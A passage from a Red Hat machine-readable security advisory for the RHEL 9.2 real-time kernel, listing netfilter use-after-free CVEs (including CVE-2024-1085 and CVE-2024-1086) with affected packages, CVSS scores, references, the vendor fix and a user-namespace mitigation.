"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: netfilter: use-after-free in nft_trans_gc_catchall_sync leads to privilege escalation"
},
{
"cve": "CVE-2024-1085",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-31T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2262127"
}
],
"notes": [
{
"category": "description",
"text": "A double-free flaw was found in how the Linux kernel\u0027s NetFilter system marks whether a catch-all element is enabled. A local user could use this flaw to crash the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: nf_tables: use-after-free vulnerability in the nft_setelem_catchall_deactivate() function",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as a having Moderate impact, because it can only be exploited by a local user with access to netfilter.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-1085"
},
{
"category": "external",
"summary": "RHBZ#2262127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262127"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-1085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1085"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-1085",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1085"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
},
{
"category": "external",
"summary": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7",
"url": "https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7"
}
],
"release_date": "2024-01-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "1. This flaw can be mitigated by preventing the affected netfilter (nf_tables) kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278.\n\n2. If the module cannot be disabled, on non-containerized deployments of Red Hat Enterprise Linux, the mitigation is to disable user namespaces:\n```\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n```\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use the second mitigation (disabling user namespaces) as the user namespaces are required for container functionality. The first mitigation (blacklisting nf_tables) is still viable for containerized deployments, providing the environment is not using netfilter.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: nf_tables: use-after-free vulnerability in the nft_setelem_catchall_deactivate() function"
},
{
"cve": "CVE-2024-1086",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-31T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2262126"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netfilter subsystem in the Linux kernel. This issue occurs in the nft_verdict_init() function, allowing positive values as a drop error within the hook verdict, therefore, the nf_hook_slow() function can cause a double-free vulnerability when NF_DROP is issued with a drop error that resembles NF_ACCEPT. The nf_tables component can be exploited to achieve local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as having an Important impact. There is the limitation that it can only be exploited by a local user with access to Netfilter, but can still allow privilege escalation if user namespaces are enabled and Netfilter is being used.",
"title": "Statement"
},
{
"category": "general",
